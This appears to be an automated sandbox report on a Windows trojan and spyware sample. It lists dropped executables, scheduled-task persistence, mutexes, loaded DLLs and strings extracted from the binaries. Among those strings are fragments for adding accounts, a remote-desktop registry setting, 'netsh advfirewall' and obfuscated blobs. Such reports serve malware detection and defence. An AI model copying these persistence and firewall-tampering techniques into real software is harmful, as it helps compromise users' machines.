Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001446000.00000004.00000020.00020000.00000000.sdmp, rundrive.exe, 00000004.00000003.2271638821.00000000009AF000.00000004.00000020.00020000.00000000.sdmp, rundrive[1].exe.1.dr, rundrive.exe.1.dr, eafkou.exe.4.dr	String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001446000.00000004.00000020.00020000.00000000.sdmp, rundrive.exe, 00000004.00000003.2271638821.00000000009AF000.00000004.00000020.00020000.00000000.sdmp, rundrive[1].exe.1.dr, rundrive.exe.1.dr, eafkou.exe.4.dr	String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001446000.00000004.00000020.00020000.00000000.sdmp, rundrive.exe, 00000004.00000003.2271638821.00000000009AF000.00000004.00000020.00020000.00000000.sdmp, rundrive[1].exe.1.dr, rundrive.exe.1.dr, eafkou.exe.4.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001446000.00000004.00000020.00020000.00000000.sdmp, rundrive.exe, 00000004.00000003.2271638821.00000000009AF000.00000004.00000020.00020000.00000000.sdmp, rundrive[1].exe.1.dr, rundrive.exe.1.dr, eafkou.exe.4.dr	String found in binary or memory: http://crl.globalsign.com/root.crl0G
Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001446000.00000004.00000020.00020000.00000000.sdmp, rundrive.exe, 00000004.00000003.2271638821.00000000009AF000.00000004.00000020.00020000.00000000.sdmp, rundrive[1].exe.1.dr, rundrive.exe.1.dr, eafkou.exe.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001446000.00000004.00000020.00020000.00000000.sdmp, rundrive.exe, 00000004.00000003.2271638821.00000000009AF000.00000004.00000020.00020000.00000000.sdmp, rundrive[1].exe.1.dr, rundrive.exe.1.dr, eafkou.exe.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001446000.00000004.00000020.00020000.00000000.sdmp, rundrive.exe, 00000004.00000003.2271638821.00000000009AF000.00000004.00000020.00020000.00000000.sdmp, rundrive[1].exe.1.dr, rundrive.exe.1.dr, eafkou.exe.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001446000.00000004.00000020.00020000.00000000.sdmp, rundrive.exe, 00000004.00000003.2271638821.00000000009AF000.00000004.00000020.00020000.00000000.sdmp, rundrive[1].exe.1.dr, rundrive.exe.1.dr, eafkou.exe.4.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001446000.00000004.00000020.00020000.00000000.sdmp, rundrive.exe, 00000004.00000003.2271638821.00000000009AF000.00000004.00000020.00020000.00000000.sdmp, rundrive[1].exe.1.dr, rundrive.exe.1.dr, eafkou.exe.4.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001446000.00000004.00000020.00020000.00000000.sdmp, rundrive.exe, 00000004.00000003.2271638821.00000000009AF000.00000004.00000020.00020000.00000000.sdmp, rundrive[1].exe.1.dr, rundrive.exe.1.dr, eafkou.exe.4.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001446000.00000004.00000020.00020000.00000000.sdmp, rundrive.exe, 00000004.00000003.2271638821.00000000009AF000.00000004.00000020.00020000.00000000.sdmp, rundrive[1].exe.1.dr, rundrive.exe.1.dr, eafkou.exe.4.dr	String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001446000.00000004.00000020.00020000.00000000.sdmp, rundrive.exe, 00000004.00000003.2271638821.00000000009AF000.00000004.00000020.00020000.00000000.sdmp, rundrive[1].exe.1.dr, rundrive.exe.1.dr, eafkou.exe.4.dr	String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001446000.00000004.00000020.00020000.00000000.sdmp, rundrive.exe, 00000004.00000003.2271638821.00000000009AF000.00000004.00000020.00020000.00000000.sdmp, rundrive[1].exe.1.dr, rundrive.exe.1.dr, eafkou.exe.4.dr	String found in binary or memory: http://ocsp.globalsign.com/rootr103
Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001446000.00000004.00000020.00020000.00000000.sdmp, rundrive.exe, 00000004.00000003.2271638821.00000000009AF000.00000004.00000020.00020000.00000000.sdmp, rundrive[1].exe.1.dr, rundrive.exe.1.dr, eafkou.exe.4.dr	String found in binary or memory: http://ocsp.globalsign.com/rootr30;
Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001446000.00000004.00000020.00020000.00000000.sdmp, rundrive.exe, 00000004.00000003.2271638821.00000000009AF000.00000004.00000020.00020000.00000000.sdmp, rundrive[1].exe.1.dr, rundrive.exe.1.dr, eafkou.exe.4.dr	String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001446000.00000004.00000020.00020000.00000000.sdmp, rundrive.exe, 00000004.00000003.2271638821.00000000009AF000.00000004.00000020.00020000.00000000.sdmp, rundrive[1].exe.1.dr, rundrive.exe.1.dr, eafkou.exe.4.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001446000.00000004.00000020.00020000.00000000.sdmp, rundrive.exe, 00000004.00000003.2271638821.00000000009AF000.00000004.00000020.00020000.00000000.sdmp, rundrive[1].exe.1.dr, rundrive.exe.1.dr, eafkou.exe.4.dr	String found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001446000.00000004.00000020.00020000.00000000.sdmp, rundrive.exe, 00000004.00000003.2271638821.00000000009AF000.00000004.00000020.00020000.00000000.sdmp, rundrive[1].exe.1.dr, rundrive.exe.1.dr, eafkou.exe.4.dr	String found in binary or memory: https://www.globalsign.com/repository/0

Source: C:\Users\user\Desktop\XO4ioEY3nq.exe

Code function: 0_2_000761F0 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegQueryInfoKeyW,RegEnumValueA,RegCloseKey,GdiplusStartup,GetDC,RegGetValueA,RegGetValueA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,RegGetValueA,GetSystemMetrics,GetSystemMetrics,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,GdipDisposeImage,GdiplusShutdown,GetUserNameA,LookupAccountNameA,GetSidIdentifierAuthority,GetSidSubAuthorityCount,GetSidSubAuthority,GetSidSubAuthority,

0_2_000761F0

System Summary

PE file contains section with special chars

Source: rundrive[1].exe.1.dr	Static PE information: section name:
Source: rundrive[1].exe.1.dr	Static PE information: section name: .idata
Source: rundrive[1].exe.1.dr	Static PE information: section name:
Source: rundrive.exe.1.dr	Static PE information: section name:
Source: rundrive.exe.1.dr	Static PE information: section name: .idata
Source: rundrive.exe.1.dr	Static PE information: section name:
Source: eafkou.exe.4.dr	Static PE information: section name:
Source: eafkou.exe.4.dr	Static PE information: section name: .idata
Source: eafkou.exe.4.dr	Static PE information: section name:

Source: C:\ProgramData\rcjuo\eafkou.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	File created: C:\Windows\Tasks\Gxtuum.job			Jump to behavior
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	File created: C:\Windows\Tasks\Test Task17.job			Jump to behavior

Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Code function: 0_2_000761F0	0_2_000761F0
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Code function: 0_2_000B40E7	0_2_000B40E7
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Code function: 0_2_000AC77D	0_2_000AC77D
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Code function: 0_2_000A2CC0	0_2_000A2CC0
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Code function: 0_2_00074EF0	0_2_00074EF0
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Code function: 0_2_000ACF09	0_2_000ACF09
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Code function: 0_2_000751A0	0_2_000751A0
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Code function: 0_2_00075450	0_2_00075450
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Code function: 0_2_0009B560	0_2_0009B560
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Code function: 0_2_0009F77B	0_2_0009F77B
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Code function: 0_2_000B1977	0_2_000B1977
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Code function: 0_2_000B5D74	0_2_000B5D74
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Code function: 0_2_000B5E94	0_2_000B5E94
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 1_2_008D61F0	1_2_008D61F0
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 1_2_008DB700	1_2_008DB700
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 1_2_009140E7	1_2_009140E7
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 1_2_00902CC0	1_2_00902CC0
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 1_2_008D4EF0	1_2_008D4EF0
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 1_2_0090CF09	1_2_0090CF09
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 1_2_008D51A0	1_2_008D51A0
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 1_2_008D5450	1_2_008D5450
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 1_2_008FB560	1_2_008FB560
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 1_2_008FF77B	1_2_008FF77B
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 1_2_00915D74	1_2_00915D74
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 1_2_00915E94	1_2_00915E94
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 2_2_009140E7	2_2_009140E7
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 2_2_008D61F0	2_2_008D61F0
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 2_2_0090C77D	2_2_0090C77D
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 2_2_00902CC0	2_2_00902CC0
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 2_2_008D4EF0	2_2_008D4EF0
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 2_2_0090CF09	2_2_0090CF09
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 2_2_008D51A0	2_2_008D51A0
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 2_2_008D5450	2_2_008D5450
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 2_2_008FB560	2_2_008FB560
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 2_2_008FF77B	2_2_008FF77B
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 2_2_00911977	2_2_00911977
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 2_2_00915D74	2_2_00915D74
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 2_2_00915E94	2_2_00915E94

Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Code function: String function: 00093FF0 appears 136 times
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Code function: String function: 0009A610 appears 56 times
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: String function: 008F9DC3 appears 76 times
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: String function: 008F30E0 appears 58 times
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: String function: 009084EC appears 34 times
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: String function: 008D61F0 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: String function: 008F3FF0 appears 272 times
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: String function: 009024D8 appears 52 times
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: String function: 008FA610 appears 112 times

Source: XO4ioEY3nq.exe

Static PE information: invalid certificate

Source: XO4ioEY3nq.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: rundrive[1].exe.1.dr	Static PE information: Section: vonkwwrp ZLIB complexity 0.9945210218078847
Source: rundrive.exe.1.dr	Static PE information: Section: vonkwwrp ZLIB complexity 0.9945210218078847
Source: eafkou.exe.4.dr	Static PE information: Section: vonkwwrp ZLIB complexity 0.9945210218078847

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@11/7@4/3

Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe

Code function: 1_2_008DE8D0 GetUserNameA,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,CoUninitialize,

1_2_008DE8D0

Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe

File created: C:\Users\user\AppData\Roaming\10000550100\

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Mutant created: \Sessions\1\BaseNamedObjects\bf11e9eb444cca0553e5dc41fdf05974
Source: C:\ProgramData\rcjuo\eafkou.exe	Mutant created: \Sessions\1\BaseNamedObjects\Test Task17

Source: C:\Users\user\Desktop\XO4ioEY3nq.exe

File created: C:\Users\user\AppData\Local\Temp\a58456755d

Jump to behavior

Source: XO4ioEY3nq.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\XO4ioEY3nq.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\XO4ioEY3nq.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: XO4ioEY3nq.exe	Virustotal: Detection: 61%
Source: XO4ioEY3nq.exe	ReversingLabs: Detection: 73%

Source: XO4ioEY3nq.exe	String found in binary or memory: " /add /y
Source: XO4ioEY3nq.exe	String found in binary or memory: " /add
Source: Gxtuum.exe	String found in binary or memory: " /add /y
Source: Gxtuum.exe	String found in binary or memory: " /add
Source: Gxtuum.exe	String found in binary or memory: " /add /y
Source: Gxtuum.exe	String found in binary or memory: " /add
Source: rundrive.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: eafkou.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: XO4ioEY3nq.exe	String found in binary or memory: " /add /y
Source: XO4ioEY3nq.exe	String found in binary or memory: " /add
Source: XO4ioEY3nq.exe	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall

Source: C:\Users\user\Desktop\XO4ioEY3nq.exe

File read: C:\Users\user\Desktop\XO4ioEY3nq.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\XO4ioEY3nq.exe "C:\Users\user\Desktop\XO4ioEY3nq.exe"
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Process created: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe "C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Process created: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe "C:\Users\user\AppData\Roaming\10000550100\rundrive.exe"
Source: unknown	Process created: C:\ProgramData\rcjuo\eafkou.exe C:\ProgramData\rcjuo\eafkou.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Process created: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe "C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Process created: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe "C:\Users\user\AppData\Roaming\10000550100\rundrive.exe"	Jump to behavior

Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Section loaded: dnsapi.dll	Jump to behavior
